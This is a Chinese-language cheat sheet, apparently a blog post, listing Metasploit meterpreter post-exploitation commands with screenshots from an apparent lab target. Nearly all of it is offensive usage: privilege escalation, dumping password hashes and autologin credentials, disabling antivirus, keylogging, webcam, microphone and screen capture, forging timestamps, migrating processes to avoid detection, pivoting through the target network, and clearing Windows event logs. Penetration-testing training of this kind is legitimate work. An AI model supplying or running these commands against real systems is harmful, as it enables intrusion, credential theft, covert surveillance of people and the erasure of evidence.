Post后渗透模块
:
在meterpreter > 中我们可以使用以下的命令来实现对目标的操作。
一、基本系统命令
sessions # sessions –h 查看帮助
sessions -i <ID值> # 进入会话 -k 杀死会话
background # 将当前会话放置后台
info # 查看已有模块信息
getuid # 查看获取的当前权限
![](https://img-blog.csdnimg.cn/cd0580ae47e94d52a22b8ff9cd36a813.png)
getsystem # 提权
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程 kill <PID值> 杀死进程
idletime # 查看目标机运行时间
![](https://img-blog.csdnimg.cn/dff0a8cb76284a8db7b58d3f4d63c422.png)
hashdump # 从SAM数据库导出密码的哈希
![](https://img-blog.csdnimg.cn/e6f8c72ae7674273a9d1894df06e0209.png)
reboot / shutdown # 重启/关机
shell # 进入目标机cmd shell
load kiwi # 加载wiki模块
run # 使用扩展库,执行已有的模块,输入run后按两下tab,列出已有的脚本
![](https://img-blog.csdnimg.cn/5eb1c93e03634f33a44398bc5455bc33.png)
run killav # 关闭杀毒软件
![](https://img-blog.csdnimg.cn/cf87456d53de469faff0d2e7e5413dd2.png)
run scraper # 查看目标主机详细信息
![](https://img-blog.csdnimg.cn/cae8a5e865e24751961d601bd151e31a.png)
二、execute执行文件
execute 参数 -f 可执行文件 # 执行可执行程序
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
三、目录/文件操作
pwd / getwd # 目标机器上当前目录(windows)
![](https://img-blog.csdnimg.cn/9e30c3b9933e45af801f0045f6c6d02b.png)
cd # 目标机器上切换目录
ls # 目标机器上显示
dir # 目标机器上查看
mkdir dir1 dir2
![](https://img-blog.csdnimg.cn/4d83769bf69b4439b0b8b0aa4b1a7475.png)
mv oldfile newfile
rmdir dir1
![](https://img-blog.csdnimg.cn/f038c7562638447e95a02d6f5f34ff4a.png)
getlwd / lpwd # 查看攻击机当前目录(Linux)
![](https://img-blog.csdnimg.cn/653109f81a6a40a9a340aecd98c41bc4.png)
lls # 在攻击机显示
lcd # 在攻击机上切换目录
cat C:\\Users\\zq\\Desktop\\123.txt # 目标机器上读取内容
edit C:\\Users\\zq\\Desktop\\123.txt # 篡改目标机器上的文件
search -f *.jsp -d e:\ # 搜索E盘中所有以.jsp为后缀的文件
upload msfdb /root/Desktop/Kage.0.1.1-beta_linux.AppImage C:\\Users\\zq\\Desktop # 将两个文件传到目标机的桌面
![](https://img-blog.csdnimg.cn/b162f38443fc49adb86b67fb3b8bbd61.png)
download C:\\Users\\zq\\Desktop\\123.txt /root # 将目标机的e:\test.txt文件下载到/root目录下
![](https://img-blog.csdnimg.cn/cee4cc305fab4e778273d5541cc9eb08.png)
四、timestomp伪造时间戳
timestomp C:// -h # 查看帮助
timestomp -v C://2.txt # 查看时间戳
timestomp C://2.txt -f C://1.txt # 将1.txt的时间戳复制给2.txt
![](https://img-blog.csdnimg.cn/19d4683855494cd8abcf5f0a0bc92374.png)
![](https://img-blog.csdnimg.cn/73d046ed3e8a45129ebcaef16a13e5d7.png)
五、进程
ps # 查看目标主机活跃进程信息
![](https://img-blog.csdnimg.cn/5782ebb0379e4a83a22f689e1c55e942.png)
getpid # 查看当前Meterpreter Shell的进程
![](https://img-blog.csdnimg.cn/fe51fdb0395140009504ca0c97b6371f.png)
migrate 1732 # 将当前Meterpreter Shell的进程迁移到PID为1732的进程上,这样不容器被发现
![](https://img-blog.csdnimg.cn/18d17579fa6a4103bbff30194625ba24.png)
kill <pid值> # 杀死进程
六、网络
arp # 显示目标机器arp缓存
![](https://img-blog.csdnimg.cn/12f5d1222c4b4707afdabb894bdceee4.png)
getproxy # 显示目标机器的代理
![](https://img-blog.csdnimg.cn/2ed5d11bcf114f0a84cb047c729ad0f5.png)
ifconfig
netstat -ano
route
![](https://img-blog.csdnimg.cn/06a9a4d50f0b497087623b19e57a742d.png)
portfwd # 端口重定向
portfwd add -l 3389 -p 3389 -r 172.16.0.100 # 将目标机的3389端口转发到本地3389端口
![](https://img-blog.csdnimg.cn/74c818ff99d64f91a431462f106589aa.png)
然后使用rdesktop ip远程登录:
![](https://img-blog.csdnimg.cn/009070ccc66b4d4d97b53d6c0f69c714.png)
七、autoroute添加路由
run autoroute –h # 查看帮助
![](https://img-blog.csdnimg.cn/ab80feb585b14c2ea16a07ee4bf08e5d.png)
run autoroute -s 192.168.159.0/24 # 添加到目标环境网络
run autoroute –p # 查看添加的路由
然后可以利用arp_scanner、portscan等进行扫描
run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389
八、uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] # 开启或禁止键盘/鼠标
uictl disable mouse # 禁用鼠标
uictl disable keyboard # 禁用键盘
九、用户接口命令(键盘嗅探,鼠标、屏幕、音频、摄像头)
keyscan_start # 开启键盘记录功能
在靶机上用键盘输入内容
keyscan_dump # 显示捕捉到的键盘记录信息
keyscan_stop # 停止键盘记录功能
![](https://img-blog.csdnimg.cn/220176cc005b4797bc0bc17e3ad82a3a.png)
鼠标:
![](https://img-blog.csdnimg.cn/eaca985bf500482589f67b11e97e6429.png)
screenshare # 屏幕共享
![](https://img-blog.csdnimg.cn/93d521c4dca14f54b0b8a306420e6df8.png)
保存在/usr/share/metasploit-framework/uDRIzzpV.html,可以直接浏览器打开。
screenshot # 截图
![](https://img-blog.csdnimg.cn/4cf5ba1d98a5433a8ae90872b0cb5c11.png)
record_mic # 音频
![](https://img-blog.csdnimg.cn/0c8d09aa11624b3480ac34a237eb8eac.png)
![](https://img-blog.csdnimg.cn/d72972ddf13a4d5292a98c77c1ce17c0.png)
play # 播放音频
![](https://img-blog.csdnimg.cn/d5e4cb653278415290ec1b60eea65c5b.png)
webcam_list # 查看目标主机的摄像头
![](https://img-blog.csdnimg.cn/52ecd98f1cba4f158f448b1bb36c2bf0.png)
webcam_snap # 目标主机摄像头拍照
webcam_stream # 目标主机通过摄像头开视频
![](https://img-blog.csdnimg.cn/ae8570238a514ef08290361aae2ba97f.png)
webcam_chat -h # 开始与目标进行视频对话。
![](https://img-blog.csdnimg.cn/f7a77295a3184deab0b87df7922c464f.png)
十、clearav清除日志
clearev # 清除windows中的应用程序日志、系统日志、安全日志
![](https://img-blog.csdnimg.cn/4897ab83fea2486d8942da4e20d722c9.png)
![](https://img-blog.csdnimg.cn/6ce4b2b0e6134b2c899eb9c9a9e4f477.png)
![](https://img-blog.csdnimg.cn/2d923c0cd36440deacf23c6a0a3e1bbf.png)
十一、信息搜集脚本
run post/windows/manage/migrate #自动进程迁移
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上
run post/linux/gather/checkvm # 是否虚拟机
![](https://img-blog.csdnimg.cn/a66c683841eb495284f114826df32cb0.png)
run post/windows/manage/killav #关闭杀毒软件
run post/windows/manage/enable_rdp #开启远程桌面服务
run post/windows/manage/autoroute #查看路由信息
run post/windows/gather/dumplinks #获取最近的文件操作
run post/windows/gather/enum_logged_on_users #列举当前登录的用户
run post/windows/gather/enum_applications #列举应用程序
run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run windows/gather/smart_hashdump #dump出所有用户的hash